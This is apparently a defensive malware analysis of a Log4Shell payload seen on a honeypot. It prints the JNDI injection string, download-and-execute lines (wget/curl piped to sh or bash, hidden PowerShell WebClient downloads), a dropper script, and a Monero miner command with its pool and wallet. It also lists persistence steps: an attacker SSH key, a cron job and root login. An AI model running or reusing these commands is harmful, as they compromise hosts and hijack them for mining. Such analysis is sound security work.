Anatomy of a Log4J Payload
CVE-2021–44228 is still going strong with scanners throwing payloads at any possible entry point. The following is a look at a payload that recently turned up in a honeypot.
Entry Point
This payload showed up on the honeypot, just a simple Python web server using Flask, as a query parameter of the main index page.
http://HONEYPOT[.]IP/?s=$%7Bjndi:ldap:%2F%2F142.93.172[.]227:1389%2FExploit
Grabbing the Payload
In order to get the payload at the other end, the attacker’s ldap server needs to be queried, this is simple enough to do with Curl
curl ldap://142.93.172[.]227:1389/Exploit
DN: Exploit
javaClassName: foojavaCodeBase: http://40.76.9[.]118:80/wp-content/themes/twentysixteen/objectClass: javaNamingReferencejavaFactory: Exploit
This provides the Log4J library with the location of the class file its being requested to load. In order to get the url, its javaCodeBase + javaFactory + “.class”
curl -o http://40.76.9[.]118:80/wp-content/themes/twentysixteen/Exploit.class
Examining the class file
Now with the first piece of malicious code in hand, its time to take a look inside. Using strings to pull anything readable out of the file gets the following
strings Exploit.class
<init>
Code
LineNumberTable
<clinit>
StackMapTable
SourceFile
Exploit.java
java/lang/String
/bin/bash
M(wget -qO - http://51.250.28[.]5/.l/log || curl http://51.250.28[.]5/.l/log) | sh
os.name
powershell
hidden
(new-object System.Net.WebClient).DownloadFile('http://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd', $env:temp + '/s.cmd');start-process -FilePath 's.cmd' -WorkingDirectory $env:tmp
(new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent[.]com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $env:temp + '/oc.cmd');start-process -FilePath 'oc.cmd' -WorkingDirectory $env:tmp
java/lang/Exception
Exploit
java/lang/Object
[Ljava/lang/String;
java/lang/System
getProperty
&(Ljava/lang/String;)Ljava/lang/String;
toLowerCase
()Ljava/lang/String;
startsWith
(Ljava/lang/String;)Z
java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
exec
(([Ljava/lang/String;)Ljava/lang/Process;
java/lang/Process
waitFor
Three interesting links popped up there
http://51.250.28[.]5/.l/log
http://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd
https://raw.githubusercontent[.]com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat
Some kind of log file, a cmd file hosted on a popped wordpress install, and a link to github for a cryptominer setup.
My log has something to tell you
Looking inside the “log” file
wget -O /tmp/pty3 http://51.250.28[.]5/.l/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://51.250.28[.]5/.l/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &curl -o /tmp/pty3 http://51.250.28[.]5/.l/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
curl -o /tmp/pty4 http://51.250.28[.]5/.l/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &(curl http://178.62.105[.]90/wp-content/themes/Grimag/ldm || wget -qO - http://178.62.105[.]90/wp-content/themes/Grimag/ldm)|bash &%
This is the entire file, just attempting to download and run some new files
pty3 and pty4
pty3 and pty4 are both x86 binaries that get downloaded and executed from the log file
Quick look at pty3
sha256: c01fa3e23232da79e1ee1e722050ab8ac09b90bfebbf93a440bc1316ef7a127c
Running it through strings spits out 750+ lines of nothing immediately useful, but VT already has links to sandbox analysis, https://www.joesandbox.com/analysis/544445/0/html
Looking into pty4
sha256: 601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6
VirusTotal: https://www.virustotal.com/gui/file/601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6
same as pty3, pty4 doesnt give anything useful on strings, but there is already sandbox analysis linked in VT, https://www.joesandbox.com/analysis/544443/0/html
LDM
The last of the “log” file downloads, 200+ line of bash, its feature set includes:
- dropping an ssh key: AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf+9gNG5s2rdTMBkOp6P7mKIQ/OkbgiozmZ3syhELI4L0M1TmJiRbbrIta8662z4WAKhXpiU22llfwrkN0m8yKJApd8lDzvvdBw+ShzJr+WaEWX7uW3WCe5NCxGxc6AU7c2vmuLlO0B203pIGVIbV1xJmj6MXrdZpNy7QRo9zStWmgmVY4GR4v26R3XDOn1gshuQ6PgUqgewQ+AlslLVuekdH23sLQfejXyJShcoFI6BbH67YTcoh4G/TuQdGe8lIeAAmp7lzzHMyu+2iSNoFFCeF48JSA2YZvssFOsGuAtV/9uPNQoi9EyvgM2mGDgJ
- setting up a cronjob to update itself
- attempting to enable root login via ssh
- phoning home over TOR
- downloading http://34.221.40[.]237/.x/3sh
sha256: 8e10768d8dfd47c41420e683c6010c3d822783add70c016d3608f0291743cdcc
VirusTotal: https://www.virustotal.com/gui/file/8e10768d8dfd47c41420e683c6010c3d822783add70c016d3608f0291743cdcc/
Interesting domains
doh.defaultroutes.de
dns.hostux.net
dns.dns-over-https.com
uncensored.lux1.dns.nixnet.xyz
dns.rubyfish.cn dns.twnic.tw
doh.centraleu.pi-dns.com
doh.dns.sb doh-fi.blahdns.com
fi.doh.dns.snopyta.org
dns.flatuslifir.is doh.li
dns.digitale-gesellschaft.ch
sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad.tor2web.su
sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad.onion.ly
sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad.onion.ws
s.cmd
Last of the files that were successfully downloaded at time of analysis, s.cmd is a powershell script that downloads an xmr miner from yet another popped wordpress site
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://68.183.165[.]105:80/wp-content/themes/twentyseventeen/xmrig64.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr[.]com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log